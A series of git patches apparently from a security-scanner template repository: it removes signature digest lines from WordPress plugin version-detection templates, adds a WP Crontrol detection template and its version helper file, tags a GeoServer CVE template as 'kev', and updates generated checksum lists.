b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050cd3ff6bae166fe13287482302834e9aebaa90ce864fefc950644e6b37205f2022100fb4e889a5cb3349894dd5e0be8d3eb6f25cb1f6377c7a9b97cc5ba5e4d37b5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 3a5b468aec..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220640f01ffe2f57fa6404d9841632e5052d3658f4d344bccb8a7d83ede8f285319022100e128f6a42eb9f602478f28fc40b0493c60ec522d05ebd3349e1ba5eeecfb0413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml new file mode 100644 index 0000000000..a773829b7d --- /dev/null +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -0,0 +1,48 @@ +id: wordpress-wp-crontrol + +info: + name: WP Crontrol Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-crontrol/ + metadata: + plugin_namespace: wp-crontrol + wpscan: https://wpscan.com/plugin/wp-crontrol + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-crontrol/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/wp-crontrol.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 0ca9c2dc82..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204884b4363520d673abd8639b6785dc1f6610405a9692c1f31320948c4bbf87b2022051e5ee53a2d9294649756b8698c1c959b18631df17811778523799fca3c15810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e812464596..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100da74bbd37026d5cd063bd2d87c78c3a629a04ba4a33f7b7ade0f0fcefa3da5400221009cf140458d03ec33fe8923a350fe00ce48073fb144cbac680c21b9694eb01ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 33a39b64b3..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fd43dbc93360a51cc2a564d9ecd71ab3758c21dc4a478c22ad8f6cedcd5c114022100ad802f0d4d9e753554590909f1804df1a3a566a7b39b670c164ea65db9aa87a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 5314ea40df..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ebdc3d8b7d35808d2444a5285d56c860763f57714b3c3fe4c91bd0f3259ea74022100a4857731f7e6c83914ebecde533e4b9b5f749eac7254d1560ebc229d06e03d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0c0969c565..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea68c91c8830eb8dbaf647993731d68b932c0609f8795182c56cf277bdea0de5022100f71936fa98b175c5b374d77a75ed1c685635b90b96ea237f327c556deea64192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 5a4cd5564f..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f85aa1d32ce9f0ba00add38a888bd198c4558b23dec6e0a51f988daf477d9243022100f0120f47540596c487de15c2e35e7679f3408664a016461a761446f929e1c9f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 5cbb7d535a..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cad53f3b3e6bfec34e3444cb3af249ae68728edc4328ff4cf14f8cbf75a15440022100bbb815bd4cba8077aeca58f4a4f67ae691816eb22d0744f261c774c415d23fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 16752dccf4..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c0de38750dcdb94e771ec1770d6688de688c80fd559528d3d9230c29db8d250221009df9528d539b814dce0a82227738e0dbc33b213df5ef0237bc0ae4231205e435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 94e42f526c..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c2a2eb5025231d4b690840b146fb34b60ffa55b5b86f8b439702057805ed3670220649f409630965c3c379d3fc03c7f7ce0046ecaeaa4514d3775abb9f977b88b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index db0c84ea04..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071166a051005f218f2cd445d3261588472d2c99a7b3a42ef3a7fcd19c507738202205215b0035c6610ea908c54da825fb41ab4afdbfb4dbb38b21afbd124abc78195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index a46072bcdd..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c662b200972c4730bac3abe62c83116ecf270217c1b521b4ac4f1b15083c22e4022100c630fb06096715824cb19c28a65aa5699a486b2965a02507afb43001ba3d1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 141cbe93d0..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220439e8bd3d1b6bd98414a3714fcc4bd5d732b8135c803ea7ec34be98fc1de4956022100d647bd858801603516b9aeebc66c3fb07666203f4ffb8b33da236e3a50403b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 12d2b56eff..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f7b82f7e6a9c6f24b940f2bfaf91dcc514f9aaa62ef8025a3166d6e49190fb002200f8a3ec15305abfbd4b358faef563de58eac9394619fcf560d644861006032b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index d467105e1f..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b0470b762199b905e27020511d55d5b1eb83627583361773cc53cb7951f18b4022100b0e02d1bd6fe83a34a46d18034d8d5cf5bf83eaef62747227002c73fadb4c45c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 6eda5f66db..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d78ec5393297257820ed021a2b2c32567175d0ac9687fc72fd3deb581cc590a60221008786a22ee6a36f2c62518a446106e25d5e3a08e578e3b9e1304ad7a9dafe3e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 30b0c571a6..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021560ac33b4b82f917023d10fdde395e8d65cacc138880cadf6f929bb499c934022100f68e31a9703453a74ca957d3c88c32f9402644e825d60930b33d08bcb20b9227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index dc648e15bc..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bdc171bb7d9ff7065e3ecdb8f06c1f222cebb6a4d8e878edccf8a8c6a58eb6b022100c40817ea26c76623c77f50e5d47eaef40250204aa87bcab3d2a9b98420671e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index e1d0b579fd..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022046393a7093b0a14ef2743dcd94e62d176af17b29de6c8026645e80cf5f4a7789022100e6d7f7cf4a8fb597f3593290f3dd9b8dc11bd112ad90becc19e9298e498d2898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 629439acb5..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0d431f8885f905dafbf76fe1444299af5d615d2eabdbd7f983e52006be33b5102206c047f984f838490f42a21dc1fd88b6d33127fb4a2770bd156e3ac409d669930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index f033252e94..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aeb3774ea370a73fe2b7a162d13df7f73b25d6fa761ca76f6b853df55e2d0ac502200a0c16c4d7c13e0039e10cc80eb20bbce9a0a96a01009874872292b68cd6f289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index e9eddc4c39..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bb300e7116c50b114c0aacb6a086647b173da0e019fa4cb56ca389815dffe6c022100c6f9d68dfea1b208b03edbecb6a1865805a73ad8c9eeb89c93759868e65cd04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index ea0789c4e4..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae898303673464ba3816949325821948ee752f688bc15e47125e3fd69d644e900221008c68527f1380a636e9e53af1c512e22d70dac37cd0dbb4b181419acdc72ac4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ad7b5c96ec..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dbb2faa62f33338d616af5c603039cb86bf08aea526d628db1903726d4b452d502203322910323a5b860c8bdb03539037f08f03d1f628e2437b195b6a207bed704a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 367590f167858ab9145d0c505d5d4901531e9c8d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 16 Jul 2024 10:24:48 +0700 Subject: [PATCH 1284/1841] Added kev tag --- http/cves/2024/CVE-2024-36401.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index 51a858d7ad..334b162ac8 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -23,7 +23,7 @@ info: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" - tags: cve,cve2024,geoserver,rce,unauth + tags: cve,cve2024,geoserver,rce,unauth,kev flow: | if(http(1)) @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 From 1667bf9d63a26ee0ea5cc280a5994476c75a3854 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 08:59:06 +0530 Subject: [PATCH 1285/1841] Create wp-crontrol.txt --- helpers/wordpress/plugins/wp-crontrol.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/wp-crontrol.txt diff --git a/helpers/wordpress/plugins/wp-crontrol.txt b/helpers/wordpress/plugins/wp-crontrol.txt new file mode 100644 index 0000000000..092afa15df --- /dev/null +++ b/helpers/wordpress/plugins/wp-crontrol.txt @@ -0,0 +1 @@ +1.17.0 From 37de2687551f9480d0285e382c4aa5bdd246597d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 03:33:36 +0000 Subject: [PATCH 1286/1841] Auto Generated New Template Addition List [Tue Jul 16 03:33:36 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1de228ee1a..804bb74809 100644 --- a/.new-additions +++ b/.new-additions @@ -15,5 +15,6 @@ http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml +http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 4d75d9f73bac627d7510d89a800205e857fddb21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 03:33:42 +0000 Subject: [PATCH 1287/1841] Auto Generated Templates Checksum [Tue Jul 16 03:33:42 UTC 2024] :robot: --- templates-checksum.txt | 416 +++++++++++++++++++++-------------------- 1 file changed, 209 insertions(+), 207 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9619570a41..5d6543c990 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -742,7 +742,7 @@ helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a helpers/wordpress/plugins/all-in-one-seo-pack.txt:a0d8efde6c39ba693651a975ac3b93c16ed3d566 helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 -helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f +helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 helpers/wordpress/plugins/astra-sites.txt:3d21640165adc9cb26c17e43dc6358a33c744d03 helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda @@ -786,7 +786,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f -helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a +helpers/wordpress/plugins/elementor.txt:d9abe4c43d66f95b79773f980a97bfd3f2148920 helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 @@ -806,7 +806,7 @@ helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b9236ecbf27032a6e5d49e873bc21600f0dab73c helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 helpers/wordpress/plugins/google-listings-and-ads.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa -helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f +helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:2aec4d7bf0ab32bb446c2b0aed18357efa20cd9f @@ -862,7 +862,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:024e6d4f5d6db7d7e0b074cb50b41ad492ddb8c3 -helpers/wordpress/plugins/pixelyoursite.txt:974a8526fa7eca888635cdcce48149cb3d049570 +helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -914,7 +914,7 @@ helpers/wordpress/plugins/webp-converter-for-media.txt:404069cef132c1712e21fc32e helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d20e6b799a7bc47bbdd80029ea94c45fd2d40b68 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 @@ -929,6 +929,7 @@ helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf +helpers/wordpress/plugins/wp-crontrol.txt:eb8b2b4c9662703da43bc73b59b0508ccdd9de8e helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 @@ -3477,7 +3478,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:9ce37b567a44a508495f69a3ecda745d30a6dcd1 +http/cves/2024/CVE-2024-36401.yaml:1092d9728d862b1d18a9ff74a145e414eb5e916e http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -7289,228 +7290,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ec6d6a80835bbb3f4141c9af043faa54caa09d90 -http/technologies/wordpress/plugins/add-to-any.yaml:45e1ec080492018feecfa2c9995d9f4f46a7e196 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a710053db37c53c93a1b7c2712ec6fbf9e5dc9d +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:49a18104c3daf80a90c52b4919c7e512e81d0d9c -http/technologies/wordpress/plugins/akismet.yaml:1a755eae638b38bf09e11a20d46e44db70bd0456 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cf549a4946cd28525b458e7d22fd60380e0c63cb -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:2a418957205cd8e1ac557a830e88689ae5ded1e6 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:d0a62ac8b1184cd285a851d188813aa801eed1f4 -http/technologies/wordpress/plugins/amp.yaml:70d51ff352fbe5bd009823857d20c84cd1077539 -http/technologies/wordpress/plugins/antispam-bee.yaml:e3dd8e3cabe81656fa177144104dbda698fa1bdf -http/technologies/wordpress/plugins/astra-sites.yaml:7e6ad639b876a664219d0b6c21179d9819cd9cd7 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e 